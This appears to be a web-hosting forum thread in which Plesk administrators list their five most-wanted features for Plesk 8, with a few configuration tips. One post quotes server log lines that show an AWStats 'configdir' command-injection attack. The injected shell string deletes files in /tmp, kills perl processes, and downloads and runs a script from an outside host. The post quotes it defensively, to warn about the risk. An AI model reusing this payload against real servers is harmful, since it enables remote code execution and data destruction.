Ok ... new approach to feature-requests. :P

Out of all of THESE (http://forum.sw-soft.com/showthread.php?s=&threadid=21558), and anything else you can think of (which you may like to add to that thread anyway) ...

Which five features would you prefer over and above any other in Plesk 8?

I'll start:

1) Domain vhost/mail aliasing
2) AWstats -AND- Urchin integration
3) F-Prot (or ClamAV if we must ;p) integration
4) FTP support to subdirectories, read-only, etc.
5) httpdocs and httpsdocs merged (optionally)

I figure this might help SWsoft decide more than a huge list. Having a small, but important list of most-wanted features gives them less of a reason not to implement them, and iron the bugs out of the, compared to introducing a huge list of less-important features.

So let's get some nice suggestions in here then bug them. :D

I dont have 5 feature requests........ but what I want to see from SW Soft is the *NIX and Windows people talking to each other alot more.

7.5 for windows has Shared SSL and hotlink protection.... wheres this in 7.5 for *NIX?

but what I want to see from SW Soft is the *NIX and Windows people talking to each other alot more.

7.5 for windows has Shared SSL and hotlink protection.... wheres this in 7.5 for *NIX?

agreed. Plesk for windows also has clamAV integration. I want to see in Plesk 8 (no particular order)...
1) clamAV integration for *nix.
2)Spamassassin 3 support.
3)Ability to grant CP access for just one CS server.
4)mod_bandwidth integration for limiting bandwidth to some domains/clients
5)Shared SSL Setup

1) Fix Spam Assassin

2) Fix Spam Assassin

3) Fix Spam Assassin

4) Fix Spam Assassin

5) Fix Spam Assassin





Bill

Yesterday i've tested Plesk 7.5 Beta 3 on a Win2003 server.
Most of the wanted features I've found in this forum are already included in the windows version.

- You can select which antivirus
- You can select which mailserver, which webmail
- You can select which FTP server
- You can select AWStats and/or Webalizer
- Bandwith throttle included
- CPU usage per domain
- Tomcat 5.5.4 included
- MySQL 4, MS-SQL, ASP.NET, virtual directories
- Remote desktop feature for domains (?) saw this greyed out icon
- Hotlink protection
- Shared SSL
- and many more....

It is amazing what they did in that version, but where is the NIX beta ?? ;o)

Bart

Try to keep it to FIVE please.

Not a feature request, but request for user-interface improvement:

Move the checkboxes from the extreme right to the left of the name on pages with lists of things (clients, domains, mailnames, etc.)

I can't tell you how many times I've "missed" and checked the wrong checkbox because it's so damned far away from the identifier.

Originally posted by brucew
I can't tell you how many times I've "missed" and checked the wrong checkbox because it's so damned far away from the identifier.
I'd disagree - the lines are coloured so u can identify which one it is - and also, unlike cPanel it does ask you to confirm any changes such as deleting accounts.

some of our top 10....

[list=1]
Ability to hide un-necessary directories from FTP users (bin, conf, pd, etc.)
phpsuexec support
Additional webmail options (choose between IMP and SquirrelMail)
Webalizer should have more "clever" settings, for first, we need to remove referer from itself
Possibilty to switch off the user rights to change the skin.
[/list=1]

Ability to hide un-necessary directories from FTP users (bin, conf, pd, etc.)


Find your proftpd.conf file, and scroll down to the section that says:

<Directory /usr/local/psa/home/vhosts>
GroupOwner psacln
</Directory>

Change it to look like this instead:

<Directory /usr/local/psa/home/vhosts>
GroupOwner psacln
HideNoAccess On
HideUser root
</Directory>

1) mod_bandwidth integration.
2) CPU, MySQL and memory usage by each domain (real-time stats).
3) Postfix.
4) Ability to change httpd.include for each domain (as safe_mode, memory_limit etc.) (now plesk refreshes it).
5) Ability to edit/upload/download language files (open-source).

Only one thing I want:

Make it fully compatible with mysql 4.1


Mysql 4.1 is now the officially recommended version of mysql and it has massive benefits over msql 4.0. It is fricken killing me not being able to run 4.1 on my site.

Ok, here comes my list:

1) Domain aliasing
2) Better backup system (more reliable and automated)
3) Awstat
4) PHP5 and MySQL 4.1 support
5) Horde 3

1) Better backup with user updatable "offline page" while backing up.
2) Abillity to add SA words via the CP.
3) Forward emails to multiple users.
4) Multi FTP accounts per domain.
5) Errr

Originally posted by jshanley
Find your proftpd.conf file, and scroll down to the section that says:

<Directory /usr/local/psa/home/vhosts>
GroupOwner psacln
</Directory>

Change it to look like this instead:

<Directory /usr/local/psa/home/vhosts>
GroupOwner psacln
HideNoAccess On
HideUser root
</Directory>

In my opinion, better change is:

<Directory /usr/local/psa/home/vhosts>
GroupOwner psacln
HideNoAccess On
HideGroup root
</Directory>

Because when you use HideUser, then you can't see subdomains, error_docs and other important directories.

I have just upgraded to Plesk from Ensim and here are some items I'd like to see:

1) Support for SquirrelMail.
2) The ability to add a name to an e-mail account.
3) The ability to use sendmail in place of qmail.
4) Domain aliasing.
5) Support for AWStats.

Thanks.

Originally posted by jlandes
I have just upgraded to Plesk from Ensim and here are some items I'd like to see:

1) Support for SquirrelMail.
2) The ability to add a name to an e-mail account.
3) The ability to use sendmail in place of qmail.
4) Domain aliasing.
5) Support for AWStats.

Thanks.

Would be great instead of supporting only squirremail, to have the hability to choose between them.

AWStats, well old theme that it seems that will be added into plesk 8.

Domain aliasing, well a must that doesnt seems probable for now.

Multiple users to 1 database, and multiple databases to 1 user would be great too.

Better backup system (more reliable and automated) <- yeah that would be awesome, maybe an admin backup inteface, where we admins can backup the whole server (psa, dbs, crons, all the info needed to perform a whole server migration without problems)

hope my features some day get applied to this CP, as it is one of the best i have used.

regards,

1. Domain Aliasing (is annoying to offer to clients alias and this keep 3-5 domains from license)
2. Better Documentton on AddOns like Tomcat for example.
3. Better subdomain management
4. Tools for Admin to monitor the server
5. Tool to see who is kill the server, or mod_bandwith

Zope/Plone

1. Domain aliasing

2. Better reseller/client setup (have clients create clients - not just domain owners)

3. Forced prefixing on creation of FTP-, database-, domain-, etc. users. (ie. make all client As user logins start with a_ and all client Bs user logins start with b_) - removing the race for taking the best usernames on each server. And making it a lot easier to completely migrate a user (client) to another server in the hosting system.

4. Better support for subdomains (one client with multiple FTP logins to subdomains - but all accessable by the Client)

5. A possibility to custom add lines to all available (Plesk written) configuration files. So an administrator may add customized stuff to each configuration file as it's written by Plesk (ie. httpd.conf (open_basedir, safe_mode, register_globals etc.), .qmail files (calling external scripts etc.) etc.)

Actually I don't wan't a lot of new added features, but more to see time spend on improving the already existing ones... (and removing possible error sources - bugfixing)

1.) Domain/email aliasing !!!!!
2.) More explanatory Help - Some instructions are almost condescending. There are places where help just repeats the same instructions. For example, under ColdFusion Settings it has choices for installation type & path and help doesn't explain the installation types at all, it basically says "select the desired installation type". That makes me want to slap the person who wrote the instructions.
3.) Increase the password field length to 32 characters
4.) Fix the disk space - Regardless of what's entered upon domain creation, it's always overridden by the amount set up in the custom template.
5.) Allow setting of Help Ticket start ID number.

FOR UNIX VERSION OF PLESK:
1) Different logos for different skins.
2) Different custom button names for different locales.
3) Possibilty to switch off the user rights to change the skin (Group change skin).
4) Client disabling without DNS disactivation (if client pays, site must be up and running in seconds, but if site is closed >24h, DNS cache fails, we must wait again for site up).
5) httpdocs and httpsdocs merged by option.

Option to delete temp updater file from /root/psa after CP upgrade

I just want to be able to send a notification email to all the email users on my server. For example, when there is a new virus outbreak, I can inform all the email users on a server on how to avoid being infected. Or to notify everyone when a server is going to be worked on.

Being able to EDIT a dns entry would be nice instead of deleting it and adding a new one.

Having some sort of DoS control would be nice like http://www.solutix.ch/cgi-bin/index.pl.

Maybe having the option of choosing between qmail and postfix and having the ability to control each from within the interface instead of relying on qmhandle or some other CLI app.

ApacheTOP like app integrated into the panel would be cool too along with MRTG graphs for server performance monitoring.

I'm affraid, gentlemen, that mod_bandwidth has not been designed for apache2...

My top 5


- AWSTATS for both web and email
- Multiple users for 1 database, and vice versa
- Backup system that lets you export an entire account and move to a new server, and supports FTP to remote storage
- SNMP support and GUI configuration for remote monitoring bandwidth, email, web, and server performance

PLESK Feature request:

I like to create mailboxes at subdomain level.

- Domain aliases for web and mail

- Filter for spam-mails: Hits < x into mailbox, mark mails with more than x hits and forward them to a seperate mailbox.

- mail-quota for the domain adjustable, not only for each mailbox

- Possibility to enable spamassassin/drweb as a default for new mailboxes

1.Debian support, i refuse to run redhat enterprise as it is broken. seriously non-usable. Mandrake is as an alternative would be nice but prefer debian.
2. Postfix support, qmail is nice and secure and postfix is even better for its licensing and frankly its config is easier.
3. Alternative webmail client support.
4. awstats support.
5. Solid backup solution. admin should be able to backup the whole system or just select domains/clients, clients should also be able to backup their whole account or perhaps just the website stuff.

Still not running plesk for myself because of the lack of Debian support, the day they offer it i will buy it but till then im just a lurker who is running it for some clients on their hardware and supporting it for them only.

Might end up running something else instead actually if this doesn't happen soon. I can handle setting up virtual domains and multiple email domains, dns and the rest by myself. Plesk would only allow me to give clients access to some of what i do for them now.

Currently hosting several hundred domains just not using anything other then vi and the cli to do it.

Five Features:

-Access to the controlpanel via controlpanel.mydomain.com URL rather than URL's that my clients never remember.

-Unlimited subdomains.. I've been told that subdomains count towards the Plesk license, which IMHO is rather cheesy

-Better Application Support: There needs to be a better delivery system from sw-soft to enable application upgrades etc. Application upgrades should be isolated from feature upgrades. It's been around 2 YEARS since MySQL 4.0 has been out, and we're still yet to see Plesk supporting it.. How sad is that?

I lose about 5 customers a month because of the lack of MySQL 4.x support.

-Privilege Support during database user creation

-Ability to remove "register"/"extras" buttons from non-admin controlpanels

First time to these fora and using 7.1.6

If any of you guys believe that any of my suggestions are fixed or have workarounds, please let me know.

Cheers.

I lose about 5 customers a month because of the lack of MySQL 4.x support

We use from Yum AtomicArt repository since almost 2 years as I remember and without a problem.

Originally posted by lvalics
We use from Yum AtomicArt repository since almost 2 years as I remember and without a problem.

Thanks, I'll look into it :)

-X

1) put a special URL instead of default when doing backup and the webpage is temporaly unavailable. It bugs lot of my customer the first time.

2) Support MySQL 4.x and PHP5
3) Support urchin and awstat
4) Give more flexibility for domain, like able to put safe mode off for one domaine, be able to use serveralias instead of domain forwarder (lfor limited license it's a big limit), In general just let per domain management more flexible.when possible.

5) I think 4 is enought big to cover the 5 too :)

Thanks for your great job guys, this is a really nice piece of software.


(maybe some suggest can reflect some knowledge deficience but i just didn't cover all teh software to masterize it. The reason is just because plesk is one of our many tools and i cannot spend all the time i want to cover all . If you have maybe some hint that you think could help me to resolve some of the aspect i put in my suggest list, email me or send me a pv message. It will be very usefull to me and my co worker :)

MySql 4.1

Originally posted by Xeno
Five Features:

-Access to the controlpanel via controlpanel.mydomain.com URL rather than URL's that my clients never remember.

this is fixable on the skeleton file, i use a folder called /plesk inside of it i add a index.php with header redirection.

-Unlimited subdomains.. I've been told that subdomains count towards the Plesk license, which IMHO is rather cheesy

Never had the chance to test this but i dont think it is true.

-Better Application Support: There needs to be a better delivery system from sw-soft to enable application upgrades etc. Application upgrades should be isolated from feature upgrades. It's been around 2 YEARS since MySQL 4.0 has been out, and we're still yet to see Plesk supporting it.. How sad is that?

ART (Atomic rocket turtle) does the trick, i have been using ART rpm's since I started my hosting business(1 year and some months ago) and i have never had a problem.

I lose about 5 customers a month because of the lack of MySQL 4.x support.

-Privilege Support during database user creation

-Ability to remove "register"/"extras" buttons from non-admin controlpanels

First time to these fora and using 7.1.6

If any of you guys believe that any of my suggestions are fixed or have workarounds, please let me know.

Cheers.

Regards,

Originally posted by smtalk
In my opinion, better change is:

<Directory /usr/local/psa/home/vhosts>
GroupOwner psacln
HideNoAccess On
HideGroup root
</Directory>

Because when you use HideUser, then you can't see subdomains, error_docs and other important directories.

The private directory is in group root so the user won't be able to see their own private directory. :)


drwx------ 2 fc root 4096 Jan 27 21:21 private/

1) Support for any other MTA besides qmail, but Exim preferred.
2) Ability to modify webalizer settings per domain.
3) MySQL v4.1
4) ClamAV support

If I have to pick from that list then here are my choices:
#1 - Domain aliasing (with email@aliaseddomain support)
#2 - Multiple FTP logins (with restrictive access for some FTP logins to certain directories and/or sub-domains)
#3 - Fix/update SpamAssassin (Select All on training page for one thing). See all posts regarding SpamAssassin
#4 - The ability to choose between different virus scanner backends such as clamAV, f-prot, etc., and have the email virus scanning icon appear if you have any of them enabled not just for dr.web. Dr. Web bites anyway.
#5 - "Live Support" addon option in the CP. Like an IRC chat window in the CP where sessioned clients could interact with logged in admin or support staff.
Okay, I couldn't just stick to 5, I saw this one and though it would be a nice feature:
#6- Password Revealer, show to admin/client/domain/mail any password under their control, like FTP, mail, DB, PLESK etc.

as i posted on cranky's post! would be nice to have server wide AMFPHP (http://www.amfphp.org/) support, to allow flash developers to count with a "onserver" flash remoting solution.

Best regards

#6- Password Revealer, show to admin/client/domain/mail any password under their control, like FTP, mail, DB, PLESK etc.

You can get PSA Power TOYS :-)

1> support for multiple hosting directories (i.e. allow me to host off of /home/httpd/vhosts and /home2/httpd/vhosts or home/httpd/vhosts and /home/httpd/vhosts2 so I can mount additional drives to grow

2> allow for remote service hosting, like offloading of my mysql database to another server, and still have all the functionality in the control panel (seamless integration)

3> PROFIT!!! ... (wait, wrong forum)

4> remove the silly licensing scheme of making me pay extra for control panel access to OSS applications like postgresql and spamassassin...

5> ... can't think of a fifth...

Hotlink protection

You can stop servers from hotlinking your site's files by editing the .htaccess file in your site's httpdocs directory.

RewriteEngine on
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^http://([a-z0-9]+\.)?your-domain\.com [NC]
RewriteRule \.(gif|jpe?g|png)$ - [F,NC,L]

My only request is MySQL 4.1 Support

Here is my top 5.

1) Access subdomain on www AND http:// not just http://
So I don’t have to edit the httpd all the time

2) Lower prices on SpamAssassin and postgresql license or just remove the silly block so we can use it…

3) Mysql 4 and php5 support.

4) Free support. We have already paid for the control panel. So its a little strange to pay so much for a little support. You gays in the Plesk team have one other firm to beat CPANEL…….

5) Lower PRICES ON EXTRA STUFF

Thanks and sorry for my bad English

1. AWSTATS
2. Improve Spamassassin (Better CP, send Spams to an IMAP Folder)
3. Faster possibility of up2date AppVault packages (rember all vulns in phpbb)
4. Improve Backup/Restore tools
5. Ability to copy Client and Domaintemplates for easier creation of new ones.

ty :)

1) Domain vhost/mail/dns aliasing
2) AWstats integration
3) ClamAV integration
4) Improved DB user control (multiple DBs per user and vice-versa).
5) Improved SpamAssassin support (different actions based on spam score)

My top wanted features:

- Php-5 support
- MySQL 4.1
- Getting the correct client address (No ISP "transparent" proxy address). As this not permits the full use for the access white-list and SSH access.
- Domain parking (Aliases) so the aliases will not consume licenses.
- More flexible way to edit/maintain custom DNS records and zones.

1. MySQL 4+

2. Gnu PGP email support integrated, should be setup for password retrieval and notifications

3. Hotlink protection button for clients and domain owners.

4. PHP applications in the Vault that actually work with PHP in SAFE_MODE or PHP running under SU_EXEC.

5. Updated CLI so that we can have all the new 7.5.x feature in the creation utils, IE; mambo cli reference, or maybe a build in list of all CLI commands.

- Domain parking (Aliases) so the aliases will not consume licenses.

It will be in Power Toys 3.5 in a few days.
Also VHOST.CONF editing

My list at this point maybe short being a new user.

1) Merge httpsdocs and httpdocs
2) cgi_bin for web_users
3) email for web_users with CP access
4) Have the subdomains just be a folder
off the web root, not in a separate space.

[list=1]
Application Vault: Possibility to restrict the applications to the customer (the application, not just its amount! Compare to '4PSA'...)
Fullfunctional subdomains (email, stats, ...), Subdomains with points (ex. www.sub.domain.xy)
AWStats
Better reseller accounts
64 Bit for unix versions
MySQL 4.x, PHP5, Postfix
Move domains from a customer to another
[/list=1]

1.- MySQL 4.1
2.- PHP-5
3.- ClamAV integration
4.- Move domain to other client
5.- More Spamassassin options

Originally posted by smtalk
In my opinion, better change is:

<Directory /usr/local/psa/home/vhosts>
GroupOwner psacln
HideNoAccess On
HideGroup root
</Directory>

Because when you use HideUser, then you can't see subdomains, error_docs and other important directories.

hello, this could be perfect if Plesk do not set permission for subdomains folder to root.root

Until Plesk do not fix this, setting subdomains as ftpusr.psaserv, domain users cannot see their subdomains ... unless they use file manager.

1) PHP 5 Support
2) MySQL 4.1 Support
3) FREE Unlimited Virus Scanner
4) FREE Unlimited Spam Assassin
5) Fedora Core 3 & 4 Support

thats my 5

Originally posted by MerK
2) MySQL 4.1 Support
4) FREE Unlimited Spam Assassin


2) MySQL 4.1 is already supported...

4) SpamAssassin is free... and unlimited...

;o)

Originally posted by Whistler
2) MySQL 4.1 is already supported...

4) SpamAssassin is free... and unlimited...

;o)


Spam Assassin control via plesk i meant.

1) DNS Templates (each site would be modeled after a template form a client or admin level)
2) Domain aliases
3) Multiple databases per user
4) Ability to set no bandwidth/space limits on domains at a client level
5) Global htaccess's (Not sure if it's feasible, but I'd want to be able to apply 'Options -Indexes' at a client level)

Also, I could have sworn I saw a feature to merge httpdocs and httpsdocs..

My top 5:

1. WebDAV
2. PHP 5 / MySQL 4
3. Latest phpMyAdmin
4-5. Pick from any of valid, good suggestions.

I posted this a while back but so nobody forgets.

1. Ability to merge all directories into one - like httpdocs, httpsdocs, and cgi-bin.
2. Ability to password protect all directories no matter they be cgi-bin.

The next I post I really dont care for. In such they will make upgradeing probally hard.

3. Update the account system.
4. More better stats logs.
5. More control panel installable applications.

Adding AWSTATS is the stupidest mistake. AWSTATs is the primary way you get hacked, no matter if you are running concurrent data or not. Let me show you a record I have:
200.117.248.78 - - [20/Jul/2005:09:59:03 -0400] "GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.geocities.com/bam_boschet/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.117.248.78 - - [20/Jul/2005:09:59:03 -0400] "GET //awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.geocities.com/bam_boschet/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 286 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.117.248.78 - - [20/Jul/2005:09:59:03 -0400] "GET //awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.geocities.com/bam_boschet/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 286 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.117.248.78 - - [20/Jul/2005:09:59:03 -0400] "GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.geocities.com/bam_boschet/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.117.248.78 - - [20/Jul/2005:09:59:04 -0400] "GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.geocities.com/bam_boschet/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.117.248.78 - - [20/Jul/2005:09:59:04 -0400] "GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.geocities.com/bam_boschet/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.117.248.78 - - [20/Jul/2005:09:59:04 -0400] "GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.geocities.com/bam_boschet/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.117.248.78 - - [20/Jul/2005:09:59:04 -0400] "GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.geocities.com/bam_boschet/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.117.248.78 - - [20/Jul/2005:09:59:04 -0400] "GET //awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.geocities.com/bam_boschet/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 286 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.117.248.78 - - [20/Jul/2005:09:59:04 -0400] "GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.geocities.com/bam_boschet/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.117.248.78 - - [20/Jul/2005:09:59:04 -0400] "GET /cgi/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.geocities.com/bam_boschet/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 289 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.117.248.78 - - [20/Jul/2005:09:59:04 -0400] "GET /cgi/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.geocities.com/bam_boschet/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 289 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.117.248.78 - - [20/Jul/2005:09:59:04 -0400] "GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.geocities.com/bam_boschet/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.117.248.78 - - [20/Jul/2005:09:59:04 -0400] "GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.geocities.com/bam_boschet/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.117.248.78 - - [20/Jul/2005:09:59:04 -0400] "GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.geocities.com/bam_boschet/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.117.248.78 - - [20/Jul/2005:09:59:04 -0400] "GET /cgi/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.geocities.com/bam_boschet/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 289 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.117.248.78 - - [20/Jul/2005:09:59:04 -0400] "GET //awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.geocities.com/bam_boschet/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 286 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.117.248.78 - - [20/Jul/2005:09:59:04 -0400] "GET //awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.geocities.com/bam_boschet/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 286 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
200.117.248.78 - - [20/Jul/2005:09:59:05 -0400] "GET /stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.geocities.com/bam_boschet/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 291 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
2

That's a script kiddie scanning the domains for AWSTATS but can't find it. If he had found one, he could install hidden bncs, mechs, and all sorts of DoS crap.

Also, what Plesk needs is for each account/domain to have its own /tmp/ directory within its structure so that any created tmp files from sessions or what have you is stored within their own directories. This would aide in finding out which domain keeps being exploited, thus making it easier to see what person is running outdated/exploitable php/pl/cgi kind of things like PPBB, Vbulletin, PHPNuke, etc...

Oh and for the record, I know a lot of people who would change from Plesk if they moved into adding more exploitable additions to their setup. And a lot of people are seeking a panel that would do the /tmp/ structure per domain for the very reason of hijacking.

Originally posted by devindull
Adding AWSTATS is the stupidest mistake. AWSTATs is the primary way you get hacked, no matter if you are running concurrent data or not.

You could easily hide awstats behind a password protected directory, or within Plesk itself so that even if it is vulnerable, it can't be reached from outside.

or just create static pages, and put the cgi out of web access.

Originally posted by Pagemakers
1) Better backup with user updatable "offline page" while backing up.
2) Abillity to add SA words via the CP.
3) Forward emails to multiple users.
4) Multi FTP accounts per domain.
5) Errr


Forwarding emails to multiple users is already there, its called an email group. Create a group using the parent email address then add any other email addresses mail should go to, to this group.

Postfix I can live without the other 4.

Ability to set a forwarding email address for SA to report to spamcop, as SA is fine but reporting them and getting thier IP's added to the RBL will prevent the spammers from eating up your CPU and bandwidth.

How about a module for modernbill or other billing solutions so that customers and admin can login and check the billing from PLESK?

This could also include proper sync of usernames, passwords, bandwidth usuage, and used/unused IP's.

Again, PHP under su_exec or Hardened-PHP.

Mod_Security addon, for editing and updating rules from PLESK?

<bump>

I agree on all the features listed on this thread!

Plesk has big potential but SW-Soft keeps ignoring us all!

1) ClamAV support
2) Possible DB prefix (see my other post in Suggestions and Feedback)
3) I personally prefer postfix over qmail

Another trio of things that piss me off:

1. PSA 4 Windows supports AWstats
2. PSA 4 Windows supports ClamAV
3. PSA 4 Linux supports neither

I understand there are separate development teams working, but AWstats and ClamAV are much more common on Linux/*nix systems, yet they are not implemented. That's a shame.

The prefix idea is good, it should be applied do databases and also to FTP accounts (for sub-domains and web users).

As for Postfix vs Qmail vs Exim vs Whatever, i'd prefer if Plesk sticks with just one, and focus on that. The base qmail package is kinda limited, that's a fact, and patches and add-ons are needed to create a full solution (contrary to Postfix or others that support a lot out of the box). However, it's still a "keep it simple" solution. It works, it's small, it's fast, it does not break, and it's secure.

Originally posted by superbock
The base qmail package is kinda limited, that's a fact, and patches and add-ons are needed to create a full solution (contrary to Postfix or others that support a lot out of the box). However, it's still a "keep it simple" solution. It works, it's small, it's fast, it does not break, and it's secure.

I have been running qmail on plesk now for about 3 months and have had it stop processing mail twice now.

i have also been running postfix for about 4 years on some other boxes and have had it stop processing mail maybe 2 or 3 times. and even then it was because i have the boxes doing autoupdates via cron-apt.

small and simple is fine till finish the sentence with limited and lacking needed features.
BTW, postfix is just as fast and as secure as qmail, its just easier to administer than qmail and more standardized

1) CPU usage per domain
2) Language Choice
3) Multiple FTP accounts
4) Tomcat 5.5
5) Choice between PHP4 and 5

Add the ability to allow remot MySQL connections, I always forget to mention this but the option inside Plesk would be welcomed :)

I would like an admin option to define a MOTD (Message of the Day) on the PSA login-frontpage.

I would love to have a better "service management" page where i can restart ssh, xinetd(for proftpd).

su_php i have lots of problems regarding file uploads with my clients.

i can live without the rest...

Originally posted by Cranky
Try to keep it to FIVE please.

No ! No limiting to 5.
Why should we? Why does Plesk give all this fancy options to Windoze Plesk? And not to *NIX ?
I also have the latest Plesk for Windoze running. And it got even more nice options.
Why??

Originally posted by nickpick
No ! No limiting to 5.
Why should we?

I created THIS (http://forum.sw-soft.com/showthread.php?s=&threadid=21558) thread for all your suggestions, but the top 5 thread for your top 5 suggestions so we can get a feel for what features are most needed (this thread) and what would simply be nice (other thread).

Two things I'd really like to see are

1) Being able to have 2 domains for one website...
Like I have website.com, i'd like website.net & website.org all point to the same website and other features. Oh and in general like normal apache, flexibility to do stuff like http://website.com/~user, be user.website.com as well... Basically alot more flexibility in aliasing locations in apache

2) Ability to have anonymous ftp regardless of exclusive IP or not.

3) Much easier installation!

I only have top TWO

Postfix
PHP 5

1) More work with spamasssasign
2) archive manager for end user - client
3) Be more stable with HSPC (DNS are a mess with HSPC)
4) Support latest php andd mysql versions
5) new webmail (i got bored with horde :P )

1) Being able to have 2 domains for one website.

This can be done using the "Domain Alias" button.

OK, here is my 2 cents again.

1. PHP SU_EXEC

2. Ruby scripting support

3. Full support for ClamAV instead of Dr.Web or atleast an option to use ClamAV and so it will show up as protecting the client's email address as currently it still show AV off if not using Dr.Web.

4. A module for mod_security which allows for custom editing of the rules.

5. When upgrading via the updater, the email which is generated should have a clear list of config files which were overwritten and the name of the previous config file which can be rolled back if needed. IE: php.ini, httpd.conf, proftpd.conf, smtp_psa, ect..

6. SMTP threshold limits: Ability to set overall server thresholds for sending emails. IE: Client can send up to 1000 Emails but any attempt to send more then that will be trapped/ported to a database and the admin notified. You could have this ability on the Client or domain level and have a new Max emails sent limit.

1. ClamAV
2. New webmail software, or the abilty to choice between two
3. Users can switch between PHP4 and PHP5 on domain-basis (if the host have both PHP4 and PHP5 installed).
4. Better Sitebuilder integration
5. SMTP messages/day limits

PLEASE Add phpsuexec support , we have long waited for this

Yes, Agree !

phpsuexec support